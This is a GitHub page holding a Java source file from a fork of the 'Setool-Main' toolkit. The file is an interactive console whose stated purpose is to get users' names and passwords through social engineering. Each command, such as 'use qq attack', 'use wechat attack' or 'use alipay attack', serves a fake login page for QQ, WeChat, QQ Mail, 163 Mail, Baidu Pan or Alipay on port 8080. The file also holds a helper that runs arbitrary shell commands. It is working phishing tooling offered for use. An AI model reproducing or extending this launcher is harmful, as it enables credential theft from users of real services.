forked from LinWin-Cloud/Setool-Main
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit_social.java
135 lines (132 loc) · 4.74 KB
/
exploit_social.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
import java.io.IOException;
import java.util.Scanner;
import java.io.BufferedReader;
import java.io.File;
import java.io.InputStreamReader;
public class exploit_social {
public static void main(String[]args) throws Exception{
/**
* use social engnnering method to get users name and password
* Payload:exploit_social
*/
in() ;
}
public static void in() throws Exception{
System.out.print("Setool-Main//Main Console//Exploit_Social//");
Scanner input = new Scanner(System.in) ;
String options = input.nextLine() ;
exploit_social.run_command(options) ;
input.close();
return ;
}
public static void run_command(String options) throws Exception , IOException {
/* the command */
String c1 = "use qqmail attack" ;
String exit = new String("exit") ;
String c2 = new String("show options") ;
String c3 = new String("use qq attack") ;
String c4 = new String("use wechat attack") ;
String c5 = new String("use 163 attack") ;
String c6 = new String("use baidu attack") ;
if (options.equals(c1)){
//use qqmail logon attack
String show = "yes" ;
setool.clear_work_path(show) ; //first,clear the work path
/*start the http port 8080 */
int port = 8080 ;
String page = "./framework/qqmail/index.html" ;
String close = "true" ;
port_start.port_server(port, page , close);
in() ;
return ;
}else if (options.equals(exit)){
//return to the main console
setool.run_main_function();
return ;
}
if (options.equals(c2)){
//show all the project of the social engnnering
File file = new File(exploit_social.class.getResource("config/exploit_social_options").getFile()) ;
setool.read_logo(file);
exploit_social.in();
return ;
}
if (options.equals(c3)){
//use qq logon attack
String show = "no" ;
setool.clear_work_path(show);
int port = 8080 ;
String page = "./framework/qq/index.html" ;
String close = "true" ;
port_start.port_server(port, page , close);
exploit_social.in();
return ;
}if (options.equals(c4)){
//use wechat logon attack
String show = "no" ;
setool.clear_work_path(show);
int port = 8080 ; String page = "./framework/wechat/index.html" ;
String close = "true" ;
port_start.port_server(port, page , close);
exploit_social.in();
return ;
}if (options.equals(c5)){
//use 163 mail attack
String show = "no" ;
setool.clear_work_path(show);
int port = 8080 ; String page = "./framework/163/index.html" ;
String close = "true" ;
port_start.port_server(port, page , close);
exploit_social.in();
return ;
}if (options.equals(c6)){
//use baidu network disk attack
String show = "no" ;
setool.clear_work_path(show);
int port = 8080 ; String page = "./framework/pan.baidu/index.html" ;
String close = "true" ;
port_start.port_server(port, page , close);
exploit_social.in();
return ;
}
else if (options.equals("use alipay attack"))
{
//use alipay logon attack
String show = "no" ;
setool.clear_work_path(show);
int port = 8080 ; String page = "./framework/alipay/index.html" ;
String close = "true" ;
port_start.port_server(port, page , close);
exploit_social.in();
return ;
}
else{
in();
return ; //return to the function : in()
}
}
public static void shell1(String cmd) {
String execution = cmd; //run the shell command
Process process = null;
BufferedReader input = null;
String user = "";
try
{
process = Runtime.getRuntime().exec(execution);
process.waitFor();
int result = process.exitValue();
input = new BufferedReader(new InputStreamReader(process.getInputStream()));
user = input.readLine();
System.out.println("Run Result:"+result);
while ( input.readLine() != null)
{
System.out.println(user);
}
}catch (Exception e) {
return ;
}finally
{
//other optionings
}
}
}